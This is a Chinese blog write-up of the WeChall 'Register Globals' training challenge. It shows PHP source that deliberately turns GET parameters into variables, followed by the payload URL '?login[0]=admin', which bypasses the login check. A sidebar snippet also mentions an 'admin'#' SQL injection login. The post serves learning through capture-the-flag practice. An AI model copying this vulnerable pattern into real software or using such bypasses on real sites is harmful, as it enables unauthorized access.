WeChall_Training: Register Globals

最新推荐文章于 2022-01-01 15:47:03 发布
最新推荐文章于 2022-01-01 15:47:03 发布
阅读量614 收藏 1
点赞数
分类专栏: CTF刷题 文章标签: WeChall
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/102388451
版权

Training: Register Globals

在这里插入图片描述
中文翻译:
在这里插入图片描述

源码:
<?php
chdir('../../../../');
define('GWF_PAGE_TITLE', 'Training: Register Globals');
require_once('challenge/html_head.php');
if (false === ($chall = WC_Challenge::getByTitle(GWF_PAGE_TITLE))) {
	$chall = WC_Challenge::dummyChallenge(GWF_PAGE_TITLE, 2, 'challenge/training/php/globals/index.php');
}
$chall->showHeader();

GWF_Debug::setDieOnError(false);
GWF_Debug::setMailOnError(false);

# EMULATE REGISTER GLOBALS = ON
foreach ($_GET as $k => $v) { $$k = $v; }


# Send request?
if (isset($_POST['password']) && isset($_POST['username']) && is_string($_POST['password']) && is_string($_POST['username']) )
{
	$uname = GDO::escape($_POST['username']);
	$pass = md5($_POST['password']);
	$query = "SELECT level FROM ".GWF_TABLE_PREFIX."wc_chall_reg_glob WHERE username='$uname' AND password='$pass'";
	$db = gdo_db();
	if (false === ($row = $db->queryFirst($query))) {
		echo GWF_HTML::error('Register Globals', $chall->lang('err_failed'));
	} else {
		# Login success
		$login = array($_POST['username'], (int)$row['level']);
	}
}

if (isset($login))
{
	echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
	if (strtolower($login[0]) === 'admin') {
		$chall->onChallengeSolved(GWF_Session::getUserID());
	}
}
else 
{
?>
<form action="globals.php" method="post">
<table>
<tr>
	<td><?php echo $chall->lang('th_username'); ?>:</td>
	<td><input type="text" name="username" value="" /></td>
</tr>
<tr>
	<td><?php echo $chall->lang('th_password'); ?>:</td>
	<td><input type="password" name="password" value="" /></td>
</tr>
<tr>
	<td></td>
	<td><input type="submit" name="send" value="<?php echo $chall->lang('btn_send'); ?>" /></td>
</tr>
</table>
</form>
<?php
}

# EMULATE REGISTER GLOBALS = OFF
foreach ($_GET as $k => $v) { unset($$k); }

require_once 'challenge/html_foot.php';
?>
解题思路:
核心代码:
if (isset($login))
{
	echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
	if (strtolower($login[0]) === 'admin') {
		$chall->onChallengeSolved(GWF_Session::getUserID());
	}
}
else 
{

这里我们只需要使$login存在并且login[0]=admin,即可完成绕过。

Payload如下:
www.wechall.net/challenge/training/php/globals/globals.php?login[0]=admin

或者
www.wechall.net/challenge/training/php/globals/globals.php?login[]=admin
两者等价

成功示意图:

在这里插入图片描述

1stPeak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WeChall Training部分
Howie‘s Blog
11-09 930
我的WeChall之旅??!Training: Get SourcedTraining: Stegano I (Training, Stegano)Training: Crypto - Caesar I (Crypto, Training)To be continued 记录以在wechall上完成的所有Challenges以便于以后学习查看,同时完成写blog的任务。 Training: Get...
python_advanced::leaf_fluttering_in_wind:Python高级版:leaf_fluttering_in_wind:
03-31
5. **locals()和globals()函数**:这两个内置函数分别返回当前作用域内的局部变量字典和全局变量字典,可以用来查看和操作这些变量。 6. **闭包(Closure)**:闭包是一种特殊的函数对象,它记住了自己被创建时的...
WeChall:Training: Register Globals (Exploit, PHP, Training)
D.MIND 的博客
07-10 271
WeChall:Training: Register Globals (Exploit, PHP, Training) 这题所需的知识点是:register global—将所有提交的参数注册为全局变量,进而将某些变量的值覆盖为我们所需要的。更多参考PHP: Using Register Globals - Manual 从32行开始,有下面这段代码: 1. if (isset($login)) { echo GWF_HTML::message('Register Globals', $c
Training: Register Globals (Exploit, PHP, Training)
Howie‘s Blog
05-09 325
Training: Register Globals (Exploit, PHP, Training) 题目描述 This challenge is a relict of old PHP times, where register globals has been enabled by default, which often lead to security issues. Again, your job is to login as admin, and you are given the sour
WeChall-writeup-4-11.17(Register Globals;Baconian;LSB;Limited Access)
Crystal_bing的博客
11-17 663
今天有时间来更新新的writeup!刚刚写完的!     前两天在看《达芬奇密码》,所以做的题稍微少了一点~丹布朗是真的很厉害!宗教,密码和文学被他融合成了他独特的一种文风。对我来说真的极具吸引力。 Training: Register Globals 这一段是用来判断用户是否成功登陆的。第一个if中验证用户名和密码,如果匹配的话就set $ login;第二个if用来判断$ login是否被...
Register Globals (Exploit, PHP, Training)
滕青山博客
02-27 252
介绍 这题所需的知识点是:register global---将所有提交的参数注册为全局变量,进而将某些变量的值覆盖为我们所需要的。更多参考PHP: Using Register Globals - Manual 分析 这题和mysql I那题很类似,但是由于加了一个判断: if (strtolower($login[0]) === 'admin') { $chall->onChallengeSolved(GWF_Session::getUserID()); } 判断中的
深入了解 register_globals (附register_globals=off 网站打不开的解决方法)
10-28
由于register_globals设置控制PHP变量访问范围,如果开启会引起不必要的安全问题,所以这里对其进行了强制关闭,如果站长的空间不支持,可以采用以下几种办法进行修改,供广大站长参考
PHP中register_globals参数为OFF和ON的区别(register_globals 使用详解)
10-28
register_globals是php.ini里的一个配置,这个配置影响到php如何接收传递过来的参数,如果你的问题是:为什么我的表单无法传递数据?为什么我的程序无法得到传递过来的变量?等等,那么你需要仔细的阅读以下的内容
分享下PHP register_globals 值为on与off的理解
10-26
从 PHP4.2.0版本开始,php.ini中的设置选项 register_globals 默认值变成了 off。所以,最好从现在就开始用Off的风格开始编程
ESLint_docs::China:ESLint文档的翻译,包括配置和规则
02-05
3. **全局变量(Globals)**:`globals`字段用于声明项目中使用的全局变量,防止ESLint误报未声明的变量。 4. **解析器(Parser)**:`parser`字段指定用来解析源代码的解析器,默认是`@babel/eslint-parser`,以...
WeChall抄答案记录【2】
一个随时准备弃坑的博客
01-01 2730
Training: MySQL I (MySQL, Exploit, Training) 这里SQL注入可以登录名用admin’#,原因是#将后面的查询语句注释掉了,所以查询成功 Training: MySQL II (MySQL, Exploit, Training) db−>queryFirst(db->queryFirst(db−>queryFirst(query): db是一个变量,db是访问数据库的对象,它有一个query方法,即根据指定的db是一个变量,db是访问数据库
Wechall PHP Writeup
Bendawang's Blog
03-19 6517
Wechall PHP Writeup
Wechall writeup By Assassin
热门推荐
Assassin
08-25 1万+
不得不说wechall的题目还是挺有趣的,外国的题目感觉和国内的题目不太一样,真是学习学习了,wp持续跟新Prime Factory #_*_ coding:utf-8 _*_ import math def is_prime(num): for i in range(2,int(math.sqrt(num))+1): if num%i==0: ret
wechall-php-wp
Iambangbang的博客
08-21 803
Training:PHP LFI ,问题的要求是最后访问solution.php,关键就是对系统目录的命名%00截断的理解,开始思路是对的。。不过还是没想到要越两级才能访问,一开始就试了一下越一级访问,发现返回的提示是no this directory or file,说明solution.php不在当前文件夹下,这时候应该向上一级访问 这里简单贴一下自己总结的几种文件包含的绕过:具体的以
WeChall Training: Get Sourced
blackcat
07-16 1071
TOOOOOO EASY 源代码一看就看见了。果然和我
WeChall Factor2 - Write Up
alongname的博客
10-22 280
题干: Factor 2 Hello qosj We have outsourced an application to an indian programmer and got disappointed. The application is not multi language capable as agreed, but the worst is... One of our coworkers could completelycircumvent the two-factor au..
10.Wechall-------------Training: Regex by Gizmore(1级)(得分2个)
qwsn
10-25 1921
0x01:题目 题目 题目地址链接 Regex http://www.wechall.net/challenge/training/regex/index.php 0x02:WR 提示 1 提示2 提示3 解题步骤 Your objective in this challenge is to learn the regex syntax. Regula...
Wechall Wireup(一)
Jun_ay的博客
10-19 1721
1. Training: Tracks (HTTP)1、进入投票页面 点击 + 号, 再次点击进行投票。 此时完成第一次投票。进行第二次时会报错。 这时,我们将VOTE cookie删掉,如果不删会导致后续不成功。 打开burp suite,抓包改包。修改If-None-Match的值,请求更新数据,因为服务器一开始会分配Etag,然后下次检测时会对比两者的值,如果一样就不更
# 数据预处理 scaler = StandardScaler() data = scaler.fit_transform(data_trainnn) label = np.squeeze(label_trainnn)报错raise TypeError( TypeError: Singleton array array({'__header__': b'MATLAB 5.0 MAT-file, Platform: PCWIN64, Created on: \xd6\xdc\xb6\xfe 5\xd4\xc2 9 00:55:30 2023', '__version__': '1.0', '__globals__': [], 'None': MatlabOpaque([(b'label', b'MCOS', b'categorical', array([[3707764736], [ 2], [ 1], [ 1], [ 1], [ 1]], dtype=uint32)) ], dtype=[('s0', 'O'), ('s1', 'O'), ('s2', 'O'), ('arr', 'O')]), '__function_workspace__': array([[ 0, 1, 73, ..., 0, 0, 0]], dtype=uint8)}, dtype=object) cannot be considered a valid collection.
最新发布
05-24
这个错误提示看起来是由于你的 label 数据格式不正确导致的。可以尝试把 label_trainnn 的类型转换为 np.ndarray,并且去掉其中的 singleton 维度,即: ``` label = np.squeeze(np.array(label_trainnn)) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值